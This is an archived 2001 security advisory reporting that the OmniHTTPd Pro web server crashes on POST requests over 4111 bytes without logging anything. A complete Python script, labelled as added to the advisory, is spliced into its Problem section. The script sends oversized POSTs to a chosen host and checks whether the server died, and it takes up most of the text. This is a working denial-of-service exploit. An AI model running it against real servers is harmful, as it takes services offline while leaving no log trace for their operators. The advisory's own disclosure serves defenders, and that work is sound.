OmniHTTPd Pro Denial of Service Vulnerability

From: SNS Research (vuln-devat_private)
Date: Tue May 15 2001 - 14:27:59 PDT


    Strumpf Noir Society Advisories
    ! Public release !
    <--#
    
    
    -= OmniHTTPd Pro Denial of Service Vulnerability =-
    
    Release date: Tuesday, May 15, 2001
    
    
    Introduction:
    
    OmniHTTPd Pro is a powerful all-purpose industry compliant web 
    server built specifically for the Windows 9x and NT platforms. 
    
    OmniHTTPd Pro can be obtained at vendor Omnicron Technologies' 
    website: http://www.omnicron.ca
    
    
    Problem:
    
    The OmniHTTPd Pro web server is susceptible to a DoS through an 
    overlong POST request. If such a request is made to the server 
    and exceeds 4111 bytes in size, the server process dies. 
    Neither the request nor the crash is recorded in the server 
    logfiles, so the outage leaves no trace on the host itself.
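    The following probe is an added example and is not part of the SNS 
    Research advisory or of OmniHTTPd. It builds a raw HTTP/1.0 POST of a 
    chosen size, sends it, and uses a harmless GET before and after as the 
    only available crash signal, since the advisory says the crash is not 
    logged. The advisory does not say whether the 4111-byte figure refers 
    to the body or to the whole request, so the example can build either. 
    The host, port and path are assumptions to be replaced with the test 
    target.

```python
"""Long-POST crash probe for the DoS described above.

Added example, not code from the advisory. Target host/port/path are
assumptions; run it only against a server you are authorised to test.
"""
import socket
from typing import Optional

THRESHOLD = 4111        # size quoted in the advisory
TARGET_HOST = "127.0.0.1"   # assumed; replace with the test server
TARGET_PORT = 80            # assumed
TARGET_PATH = "/"           # assumed


def build_post(path: str, host: str, body_len: int) -> bytes:
    """Return a well-formed HTTP/1.0 POST whose body is body_len bytes of 'A'.

    Content-Length matches the body, so a server that dies on it is
    failing on size alone, not on a malformed request.
    """
    body = b"A" * body_len
    headers = (
        f"POST {path} HTTP/1.0\r\n"
        f"Host: {host}\r\n"
        f"Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        f"\r\n"
    ).encode("ascii")
    return headers + body


def build_post_of_total_size(path: str, host: str, total_len: int) -> bytes:
    """Return a POST whose complete request (headers + body) is total_len bytes.

    Needed because the advisory's 4111 may refer to the whole request rather
    than the body. The Content-Length digits change the header size, so the
    body length is adjusted until the total is exact.
    """
    body_len = max(total_len - len(build_post(path, host, 0)), 0)
    req = build_post(path, host, body_len)
    for _ in range(4):                      # digit-width changes converge quickly
        diff = total_len - len(req)
        if diff == 0 or body_len + diff < 0:
            break
        body_len += diff
        req = build_post(path, host, body_len)
    return req


def send_raw(host: str, port: int, data: bytes, timeout: float = 5.0) -> Optional[bytes]:
    """Send data and return the server's reply, or None on refused/reset/timeout.

    A refused connection after the long POST is the signal that the server
    process is gone; the advisory says nothing will appear in the logs.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(data)
            chunks = []
            while True:
                chunk = s.recv(4096)
                if not chunk:
                    break
                chunks.append(chunk)
            return b"".join(chunks)
    except OSError:                      # includes socket.timeout and ECONNREFUSED
        return None


def server_alive(host: str, port: int) -> bool:
    """Liveness check with a harmless GET; False once the process has died."""
    probe = f"GET / HTTP/1.0\r\nHost: {host}\r\n\r\n".encode("ascii")
    return send_raw(host, port, probe, timeout=3.0) is not None


def probe(host: str, port: int, path: str, body_len: int):
    """Return (alive_before, reply_to_post, alive_after) for one POST of body_len bytes."""
    before = server_alive(host, port)
    reply = send_raw(host, port, build_post(path, host, body_len))
    after = server_alive(host, port)
    return before, reply, after


if __name__ == "__main__":
    # One byte over the advisory's threshold; compare with a request one byte under it.
    for size in (THRESHOLD - 1, THRESHOLD + 1):
        before, reply, after = probe(TARGET_HOST, TARGET_PORT, TARGET_PATH, size)
        print(f"body={size}: alive_before={before} got_reply={reply is not None} alive_after={after}")
```

    Run the two sizes in the order shown: a server that answers the 4110-byte 
    POST and then refuses connections after the 4112-byte one reproduces the 
    advisory's behaviour. Because nothing is logged, the `alive_after` flag 
    (or a process listing on the Windows host) is the only evidence to keep.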
    
    
    (..)
    
    
    Solution:
    
    The vendor was initially notified on the 23rd of April, 2001. After 
    several attempts on our part to follow up on this, salesat_private 
    on May 2nd told us the matter was under investigation. At present 
    no fix for the problem appears forthcoming.
    
    This was tested against OmniHTTPd Pro v2.08 on WINNT4.
    
    
    yadayadayada
    
    Free sk8! (http://www.freesk8.org)
    
    SNS Research is rfpolicy (http://www.wiretrip.net/rfp/policy.html) 
    compliant, all information is provided on AS IS basis.
    
    EOF, but Strumpf Noir Society will return!
    



    This archive was generated by hypermail 2b30 : Wed May 16 2001 - 02:29:25 PDT